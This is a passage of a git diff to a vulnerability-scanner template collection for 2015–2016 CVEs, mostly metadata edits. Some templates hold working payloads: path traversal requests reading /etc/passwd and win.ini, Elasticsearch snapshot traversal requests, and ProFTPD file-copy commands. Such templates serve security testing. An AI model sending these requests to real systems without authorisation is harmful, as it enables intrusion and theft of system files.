https://www.exploit-db.com/exploits/36803/ + - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html + - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html + classification: + cve-id: CVE-2015-3306 + tags: cve,cve2015,ftp,rce,network,proftpd network: - inputs: @@ -17,13 +23,14 @@ network: - data: "site cpfr /tmp/.{{randstr}}\r\n" read: 1024 - data: "site cpto /var/www/html/{{randstr}}\r\n" + host: - - "{{Hostname}}:21" - "{{Hostname}}" + - "{{Host}}:21" read-size: 1024 matchers: - type: word + part: raw words: - "Copy successful" - part: raw \ No newline at end of file diff --git a/cves/2015/CVE-2015-3337.yaml b/cves/2015/CVE-2015-3337.yaml index 57306fca9b..9f755b9cac 100644 --- a/cves/2015/CVE-2015-3337.yaml +++ b/cves/2015/CVE-2015-3337.yaml @@ -5,8 +5,14 @@ info: author: pdteam severity: high description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors. - reference: https://www.exploit-db.com/exploits/37054/ - tags: cve,cve2015,elastic,lfi + reference: + - https://www.exploit-db.com/exploits/37054/ + - http://www.securityfocus.com/archive/1/535385 + - https://www.elastic.co/community/security + - http://www.debian.org/security/2015/dsa-3241 + classification: + cve-id: CVE-2015-3337 + tags: cve,cve2015,elastic,lfi,elasticsearch,plugin requests: - method: GET @@ -17,7 +23,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status diff --git a/cves/2015/CVE-2015-3648.yaml b/cves/2015/CVE-2015-3648.yaml index 672f04a518..c1cac6dd15 100644 --- a/cves/2015/CVE-2015-3648.yaml +++ b/cves/2015/CVE-2015-3648.yaml @@ -8,12 +8,16 @@ info: reference: - https://vulners.com/cve/CVE-2015-3648/ - https://www.securityfocus.com/bid/75019 + - http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738 + - http://packetstormsecurity.com/files/132142/ResourceSpace-7.1.6513-Local-File-Inclusion.html + classification: + cve-id: CVE-2015-3648 tags: cve,cve2015,lfi,resourcespace requests: - method: GET path: - - "{{BaseURL}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + - "{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" matchers-condition: and matchers: diff --git a/cves/2015/CVE-2015-3897.yaml b/cves/2015/CVE-2015-3897.yaml new file mode 100644 index 0000000000..71779328d7 --- /dev/null +++ b/cves/2015/CVE-2015-3897.yaml @@ -0,0 +1,39 @@ +id: CVE-2015-3897 + +info: + name: Bonita BPM 6.5.1 - Unauthenticated Directory Traversal + author: 0x_Akoko + severity: high + description: Directory traversal vulnerability in Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource. + reference: + - https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html + - https://www.bonitasoft.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-3897 + - https://www.htbridge.com/advisory/HTB23259 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2015-3897 + cwe-id: CWE-22 + tags: cve,cve2015,bonita,lfi,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd" + - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: regex + regex: + - "root:[x*]:0:0:" diff --git a/cves/2015/CVE-2015-4050.yaml b/cves/2015/CVE-2015-4050.yaml index a56e9847ee..ccae12fe70 100644 --- a/cves/2015/CVE-2015-4050.yaml +++ b/cves/2015/CVE-2015-4050.yaml @@ -5,10 +5,14 @@ info: author: ELSFA7110,meme-lord severity: high description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment. - tags: cve,cve2015,symfony,rce reference: - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - https://nvd.nist.gov/vuln/detail/CVE-2015-4050 + - http://symfony.com/blog/cve-2015-4050-esi-unauthorized-access + - http://www.debian.org/security/2015/dsa-3276 + classification: + cve-id: CVE-2015-4050 + tags: cve,cve2015,symfony,rce requests: - method: GET diff --git a/cves/2015/CVE-2015-4414.yaml b/cves/2015/CVE-2015-4414.yaml index ac61202462..59c92e4279 100644 --- a/cves/2015/CVE-2015-4414.yaml +++ b/cves/2015/CVE-2015-4414.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/37274 - https://www.cvedetails.com/cve/CVE-2015-4414 + - https://www.exploit-db.com/exploits/37274/ + - http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html + classification: + cve-id: CVE-2015-4414 tags: cve,cve2015,wordpress,wp-plugin,lfi requests: @@ -20,8 +24,8 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2015/CVE-2015-4632.yaml b/cves/2015/CVE-2015-4632.yaml index 6e9567001c..b32d845e51 100644 --- a/cves/2015/CVE-2015-4632.yaml +++ b/cves/2015/CVE-2015-4632.yaml @@ -5,15 +5,17 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search. - reference: | + reference: - https://www.exploit-db.com/exploits/37388 - https://www.cvedetails.com/cve/CVE-2015-4632 - tags: cve,cve2015,lfi + - https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ + - https://www.exploit-db.com/exploits/37388/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2015-4632 cwe-id: CWE-22 + tags: cve,cve2015,lfi requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2015/CVE-2015-4694.yaml b/cves/2015/CVE-2015-4694.yaml index 97b8256f1d..1a6ac1b0f5 100644 --- a/cves/2015/CVE-2015-4694.yaml +++ b/cves/2015/CVE-2015-4694.yaml @@ -1,17 +1,21 @@ id: CVE-2015-4694 info: - name: Zip Attachments <= 1.1.4 - Arbitrary File Download + name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. - reference: https://wpscan.com/vulnerability/8047 - tags: lfi,wordpress,cve,cve2015,wp-plugin + description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file. + reference: + - https://wordpress.org/plugins/zip-attachments/#developers + - https://wpscan.com/vulnerability/8047 + - https://nvd.nist.gov/vuln/detail/CVE-2015-4694 + - http://www.vapid.dhs.org/advisory.php?v=126 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.60 + cvss-score: 8.6 cve-id: CVE-2015-4694 cwe-id: CWE-22 + tags: lfi,wordpress,cve,cve2015,wp-plugin requests: - method: GET @@ -28,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/12 diff --git a/cves/2015/CVE-2015-5461.yaml b/cves/2015/CVE-2015-5461.yaml index e5416a7c9e..37fe790d57 100644 --- a/cves/2015/CVE-2015-5461.yaml +++ b/cves/2015/CVE-2015-5461.yaml @@ -8,6 +8,10 @@ info: reference: - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16 - https://nvd.nist.gov/vuln/detail/CVE-2015-5461 + - https://wordpress.org/plugins/stageshow/changelog/ + - http://seclists.org/fulldisclosure/2015/Jul/27 + classification: + cve-id: CVE-2015-5461 tags: redirect,cve,cve2015,wordpress,wp-plugin requests: diff --git a/cves/2015/CVE-2015-5471.yaml b/cves/2015/CVE-2015-5471.yaml index 37ed1b5e40..4b257f672c 100644 --- a/cves/2015/CVE-2015-5471.yaml +++ b/cves/2015/CVE-2015-5471.yaml @@ -1,19 +1,22 @@ id: CVE-2015-5471 + info: name: Swim Team <= v1.44.10777 - Local File Inclusion author: 0x_Akoko severity: medium - description: The code in ./wp-swimteam/include/user/download.php doesnt sanitize user input from downloading sensitive system files. + description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system. reference: - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 - http://www.vapid.dhs.org/advisory.php?v=134 - https://nvd.nist.gov/vuln/detail/CVE-2015-5471 - tags: cve,cve2015,wordpress,wp-plugin,lfi + - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html + remediation: Upgrade to Swim Team version 1.45 or newer. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2015-5471 cwe-id: CWE-22 + tags: cve,cve2015,wordpress,wp-plugin,lfi requests: - method: GET @@ -30,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by cs on 2022/02/25 diff --git a/cves/2015/CVE-2015-5531.yaml b/cves/2015/CVE-2015-5531.yaml new file mode 100644 index 0000000000..f60c575c93 --- /dev/null +++ b/cves/2015/CVE-2015-5531.yaml @@ -0,0 +1,57 @@ +id: CVE-2015-5531 + +info: + name: ElasticSearch directory traversal vulnerability (CVE-2015-5531) + author: princechaddha + severity: high + description: Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls. + reference: + - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 + - https://nvd.nist.gov/vuln/detail/CVE-2015-5531 + - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html + - https://www.elastic.co/community/security/ + classification: + cve-id: CVE-2015-5531 + tags: cve,cve2015,elasticsearch + +requests: + - raw: + - | + PUT /_snapshot/test HTTP/1.1 + Host: {{Hostname}} + + { + "type": "fs", + "settings": { + "location": "/usr/share/elasticsearch/repo/test" + } + } + + - | + PUT /_snapshot/test2 HTTP/1.1 + Host: {{Hostname}} + + { + "type": "fs", + "settings": { + "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" + } + } + + - | + GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ElasticsearchParseException' + - 'Failed to derive xcontent from' + - '114, 111, 111, 116, 58' + condition: and + + - type: status + status: + - 400 diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml index aef5505ea8..91b6573794 100644 --- a/cves/2015/CVE-2015-5688.yaml +++ b/cves/2015/CVE-2015-5688.yaml @@ -8,6 +8,9 @@ info: reference: - https://nodesecurity.io/advisories/geddy-directory-traversal - https://github.com/geddy/geddy/issues/697 + - https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231 + classification: + cve-id: CVE-2015-5688 tags: cve,cve2015,geddy,lfi requests: @@ -19,7 +22,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status diff --git a/cves/2015/CVE-2015-6477.yaml b/cves/2015/CVE-2015-6477.yaml index 22bd0f786b..ec71bd0334 100644 --- a/cves/2015/CVE-2015-6477.yaml +++ b/cves/2015/CVE-2015-6477.yaml @@ -2,14 +2,15 @@ id: CVE-2015-6477 info: name: Nordex NC2 'username' Parameter XSS + author: geeknik + severity: medium description: An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://seclists.org/fulldisclosure/2015/Dec/117 - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 - https://nvd.nist.gov/vuln/detail/CVE-2015-6477 - - author: geeknik - severity: medium + classification: + cve-id: CVE-2015-6477 tags: cve,cve2015,xss,iot,nordex,nc2 requests: diff --git a/cves/2015/CVE-2015-6544.yaml b/cves/2015/CVE-2015-6544.yaml index 23b0e18646..b0c4f26019 100644 --- a/cves/2015/CVE-2015-6544.yaml +++ b/cves/2015/CVE-2015-6544.yaml @@ -6,13 +6,17 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. - reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544 - tags: cve,cve2015,xss,itop + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2015-6544 + - https://www.htbridge.com/advisory/HTB23268 + - http://sourceforge.net/p/itop/tickets/1114/ + - http://sourceforge.net/p/itop/code/3662/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2015-6544 cwe-id: CWE-79 + tags: cve,cve2015,xss,itop requests: - method: GET diff --git a/cves/2015/CVE-2015-6920.yaml b/cves/2015/CVE-2015-6920.yaml index ae97ca5705..555bed6a26 100644 --- a/cves/2015/CVE-2015-6920.yaml +++ b/cves/2015/CVE-2015-6920.yaml @@ -8,6 +8,10 @@ info: reference: - https://packetstormsecurity.com/files/133371/ - https://nvd.nist.gov/vuln/detail/CVE-2015-6920 + - http://packetstormsecurity.com/files/133371/WordPress-sourceAFRICA-0.1.3-Cross-Site-Scripting.html + - https://wpvulndb.com/vulnerabilities/8169 + classification: + cve-id: CVE-2015-6920 tags: cve,cve2015,wordpress,wp-plugin,xss requests: diff --git a/cves/2015/CVE-2015-7297.yaml b/cves/2015/CVE-2015-7297.yaml index b42e4ae2f7..841dc43b36 100644 --- a/cves/2015/CVE-2015-7297.yaml +++ b/cves/2015/CVE-2015-7297.yaml @@ -1,10 +1,16 @@ id: CVE-2015-7297 + info: name: Joomla Core SQL Injection author: princechaddha severity: high - description: SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands. - reference: http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html + description: A SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2015-7297 + - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html + - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/ + classification: + cve-id: CVE-2015-7297 tags: cve,cve2015,joomla,sqli requests: @@ -17,3 +23,5 @@ requests: words: - "cf79ae6addba60ad018347359bd144d2" part: body + +# Enhanced by mp on 2022/03/02 diff --git a/cves/2015/CVE-2015-7377.yaml b/cves/2015/CVE-2015-7377.yaml index 0e95547716..a5229480b0 100644 --- a/cves/2015/CVE-2015-7377.yaml +++ b/cves/2015/CVE-2015-7377.yaml @@ -4,11 +4,15 @@ info: name: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI. reference: - https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2015-7377 + - http://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html + - https://github.com/GTSolutions/Pie-Register/blob/2.0.19/readme.txt + classification: + cve-id: CVE-2015-7377 tags: cve,cve2015,wordpress,wp-plugin,xss - description: "Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI." requests: - method: GET diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index 8f542a5c14..4f0418f4b2 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml @@ -1,20 +1,21 @@ id: CVE-2015-7450 info: - name: IBM WebSphere Java Object Deserialization RCE + name: IBM WebSphere Java Object Deserialization - Remote Code Execution author: wdahlenb severity: critical - description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default) + description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default). reference: - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - tags: cve,cve2015,websphere,deserialization,rce,oast + - http://www-01.ibm.com/support/docview.wss?uid=swg21972799 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2015-7450 cwe-id: CWE-94 + tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java requests: - raw: @@ -51,6 +52,8 @@ requests: condition: and - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2015/CVE-2015-7780.yaml b/cves/2015/CVE-2015-7780.yaml index 69704c0919..d18f8a1350 100644 --- a/cves/2015/CVE-2015-7780.yaml +++ b/cves/2015/CVE-2015-7780.yaml @@ -8,12 +8,14 @@ info: reference: - https://www.exploit-db.com/exploits/35933 - https://www.cvedetails.com/cve/CVE-2015-7780/ - tags: cve,cve2015,lfi,manageengine + - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html + - http://jvn.jp/en/jp/JVN21968837/index.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.50 + cvss-score: 6.5 cve-id: CVE-2015-7780 cwe-id: CWE-22 + tags: cve,cve2015,lfi,manageengine requests: - method: GET diff --git a/cves/2015/CVE-2015-7823.yaml b/cves/2015/CVE-2015-7823.yaml index 6cb8fcbda7..78174bdbb0 100644 --- a/cves/2015/CVE-2015-7823.yaml +++ b/cves/2015/CVE-2015-7823.yaml @@ -3,11 +3,14 @@ id: CVE-2015-7823 info: name: Kentico CMS 8.2 Open Redirection author: 0x_Akoko + severity: low description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability reference: - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html - https://nvd.nist.gov/vuln/detail/CVE-2015-7823 - severity: low + - http://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html + classification: + cve-id: CVE-2015-7823 tags: cve,cve2015,kentico,redirect requests: @@ -19,4 +22,4 @@ requests: - type: regex regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header \ No newline at end of file + part: header diff --git a/cves/2015/CVE-2015-8349.yaml b/cves/2015/CVE-2015-8349.yaml index 266da313a8..df806df557 100644 --- a/cves/2015/CVE-2015-8349.yaml +++ b/cves/2015/CVE-2015-8349.yaml @@ -5,13 +5,16 @@ info: author: pikpikcu severity: medium description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php. - reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349 - tags: cve,cve2015,xss,sourcebans + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2015-8349 + - https://www.htbridge.com/advisory/HTB23273 + - http://www.securityfocus.com/archive/1/537018/100/0/threaded classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2015-8349 cwe-id: CWE-79 + tags: cve,cve2015,xss,sourcebans requests: - method: GET diff --git a/cves/2015/CVE-2015-8399.yaml b/cves/2015/CVE-2015-8399.yaml index 55ff02a7c7..907864b58b 100644 --- a/cves/2015/CVE-2015-8399.yaml +++ b/cves/2015/CVE-2015-8399.yaml @@ -1,21 +1,28 @@ id: CVE-2015-8399 + info: - author: princechaddha name: Atlassian Confluence configuration files read + author: princechaddha severity: medium description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. - reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro - tags: cve,cve2015,atlassian,confluence + reference: + - https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro + - https://www.exploit-db.com/exploits/39170/ + - http://www.securityfocus.com/archive/1/537232/100/0/threaded classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.30 + cvss-score: 4.3 cve-id: CVE-2015-8399 cwe-id: CWE-200 + metadata: + shodan-query: http.component:"Atlassian Confluence" + tags: cve,cve2015,atlassian,confluence requests: - method: GET path: - "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName" + matchers-condition: and matchers: - type: status @@ -23,8 +30,8 @@ requests: - 200 - type: word + part: body words: - "confluence-init.properties" - "View Default Decorator" condition: and - part: body diff --git a/cves/2015/CVE-2015-8813.yaml b/cves/2015/CVE-2015-8813.yaml index 2651aa807d..6b29a0b822 100644 --- a/cves/2015/CVE-2015-8813.yaml +++ b/cves/2015/CVE-2015-8813.yaml @@ -8,12 +8,14 @@ info: reference: - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 - tags: cve,cve2015,ssrf,oast + - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce + - http://www.openwall.com/lists/oss-security/2016/02/18/8 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N - cvss-score: 8.20 + cvss-score: 8.2 cve-id: CVE-2015-8813 cwe-id: CWE-918 + tags: cve,cve2015,ssrf,oast,umbraco requests: - method: GET @@ -22,6 +24,6 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" \ No newline at end of file + - "http" diff --git a/cves/2015/CVE-2015-9414.yaml b/cves/2015/CVE-2015-9414.yaml index d65a7b2262..2a6a4b8d52 100644 --- a/cves/2015/CVE-2015-9414.yaml +++ b/cves/2015/CVE-2015-9414.yaml @@ -4,16 +4,18 @@ info: name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter. reference: - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095 - https://nvd.nist.gov/vuln/detail/CVE-2015-9414 - tags: cve,cve2015,wordpress,wp-plugin,xss + - https://wpvulndb.com/vulnerabilities/8175 + - https://wordpress.org/plugins/wp-symposium/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2015-9414 cwe-id: CWE-79 - description: "The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter." + tags: cve,cve2015,wordpress,wp-plugin,xss requests: - method: GET diff --git a/cves/2015/CVE-2015-9480.yaml b/cves/2015/CVE-2015-9480.yaml index aff9aca94d..ac300031f7 100644 --- a/cves/2015/CVE-2015-9480.yaml +++ b/cves/2015/CVE-2015-9480.yaml @@ -1,19 +1,19 @@ id: CVE-2015-9480 info: - name: WordPress Plugin RobotCPA 5 - Directory Traversal + name: WordPress RobotCPA 5 - Directory Traversal author: daffainfo severity: high + description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 - https://www.exploit-db.com/exploits/37252 - tags: cve,cve2015,wordpress,wp-plugin,lfi + - https://nvd.nist.gov/vuln/detail/CVE-2015-9480 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2015-9480 cwe-id: CWE-22 - description: "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter." + tags: cve,cve2015,wordpress,wp-plugin,lfi requests: - method: GET @@ -24,8 +24,10 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status status: - 200 + +# Enhanced by mp on 2022/04/20 diff --git a/cves/2016/CVE-2016-0957.yaml b/cves/2016/CVE-2016-0957.yaml index 55a0fb1e4e..d2fb10609d 100644 --- a/cves/2016/CVE-2016-0957.yaml +++ b/cves/2016/CVE-2016-0957.yaml @@ -3,14 +3,16 @@ id: CVE-2016-0957 info: name: Adobe AEM Console Disclosure author: geeknik - description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. - reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html severity: high - tags: cve,cve2016,adobe,aem + description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. + reference: + - https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html + - https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2016-0957 + tags: cve,cve2016,adobe,aem requests: - method: GET diff --git a/cves/2016/CVE-2016-1000126.yaml b/cves/2016/CVE-2016-1000126.yaml index 7570661517..e2b9a6d7ed 100644 --- a/cves/2016/CVE-2016-1000126.yaml +++ b/cves/2016/CVE-2016-1000126.yaml @@ -4,14 +4,18 @@ info: name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin admin-font-editor v1.8 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=526 + - https://wordpress.org/plugins/admin-font-editor + - http://www.securityfocus.com/bid/93896 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000126 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin admin-font-editor v1.8" + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000127.yaml b/cves/2016/CVE-2016-1000127.yaml index 51c400aa1e..4259ca9297 100644 --- a/cves/2016/CVE-2016-1000127.yaml +++ b/cves/2016/CVE-2016-1000127.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin ajax-random-post v2.00 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=494 + - https://wordpress.org/plugins/ajax-random-post + - http://www.securityfocus.com/bid/93895 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000127 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml index 9e8645e466..b824ab00f2 100644 --- a/cves/2016/CVE-2016-1000128.yaml +++ 